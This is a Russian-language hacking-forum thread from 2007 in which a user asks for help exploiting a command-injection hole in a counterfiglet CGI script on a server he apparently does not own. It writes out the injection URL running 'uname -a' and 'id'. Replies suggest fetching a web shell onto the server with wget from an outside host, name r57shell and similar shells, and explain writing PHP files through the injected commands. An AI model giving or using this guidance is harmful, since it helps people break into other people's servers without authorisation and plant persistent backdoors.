Дыра cgi-bin/counterfiglet....

Discussion in 'Уязвимости' started by vipklient, 7 Feb 2007.

  1. vipklient

    vipklient New Member

    Joined:
    7 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    Нашёл дыру на одном сервере вот такого типа: cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id...
    Прочитал об этой дыре много... С её помошью можно залить на сервак Shell... Проблема в том что сам Shell найти немогу. Нашёл когдато здесь на форуме PHP сплойт под эту дыру, а скомпилить неполучается... Да даже дело не в скомпилить, просто я её поошибке затёр. И сейчас немогу найти его.Помоему инекция конкретно работает с этой дырой. Вообщем: Помогите мне воспользоватся этой дырой, своими советами и подсказками. Shell бы тоже непомишал. Или на худой конец помогите найти здесь на форуме Php сплойт для данной дыры.
     
    #1 vipklient, 7 Feb 2007
    Last edited: 7 Feb 2007
  2. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    ты команды можешь исполнять что еще тебе надо?
     
  3. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    wget yoursite.com/shell.php
    а шеллы прям по гуглю r57shell, antichat shell ну или в поиске на ачате
     
  4. vipklient

    vipklient New Member

    Joined:
    7 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    А поподобнее можно...
     
  5. vipklient

    vipklient New Member

    Joined:
    7 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    Напиши плз. как правелно залить r57shell.
     
  6. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Для начало тебе нужна папка с правами на запись.
    Если разрешенно записывать в папку с самим cgi скриптом то туда надо закинуть cgi shell.
    Вообще определись что тебе попробуй команды типо echо 123>123.php а вообще можно полноценно лазить как через шелл... просто исполняя команды так...
    2n0ne
    Гениально :)
     
  7. vipklient

    vipklient New Member

    Joined:
    7 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    А если без шелла. Как найти команды которые он будет воспринимать?
     
  8. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    все команды nix систем..
    Если там nix...
     
  9. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Ради интереса вбил в поисковик counterfiglet нашел вот это http://herurg.chat.ru/counterfiglet.txt . Внимания заслуживает дата 1995
     
  10. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    [ cash ], уху)) я такой :D

    Автор, после "f=" пишешь команду)
    попробуй "ls -la" без кавычек, ответ есть?
    и если, как ты написал, тебе сервер не отвечает, с чего ты взял что ты можешь там что-то исполнять?))
     
  11. vipklient

    vipklient New Member

    Joined:
    7 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    1.Может дадите ссылку где можно почитать про интерпритацию команд! Какие действия выполняет конкретная команда?
    2. Нашёл ссылку такого плана если быть точным то это кнопка: <a href="[адрес сайта]l=1&i=31587" target=_blank><img src="[адрес сайта]/f.gif" border=0 width=88 height=31 title="Бла-бла-бла" alt="Бла-бла-бла"></a>
    Могу ли я через неё юзать Shell?
     
  12. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    млять ми под сталом.
    2vipklient
    нет не можешь...
     
  13. vipklient

    vipklient New Member

    Joined:
    7 Feb 2007
    Messages:
    8
    Likes Received:
    1
    Reputations:
    -1
    Ок... Чё столько эмоций я непойму. Это вроде форум и я просто спрашиваю у знающих людей. Иначе зачем тогда нужен форум?! Просто если б каждый отвечал нормально на вопрос с пояснением хотя бынебольшим так было бы проще и мне и вам. Я бы поскорее разобрался и незадавал бы, как вам кажется, глупые вопросы. Я быстро учусь) все мы были чайниками когдато но научились же)

    Может я неверно выразился. Я имел ввиду: в ссылку на данную кнопку я могу подставить адрес на свой сайт где лежит шел и что б он работал не смоим сайтом а с выше упомянутым. Или только могу её использовать для пасивного Xss?
     
    #13 vipklient, 14 Feb 2007
    Last edited: 14 Feb 2007
  14. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Не обижайся но выучи для начала хотя Html разметку, надо все же знать какие то азы.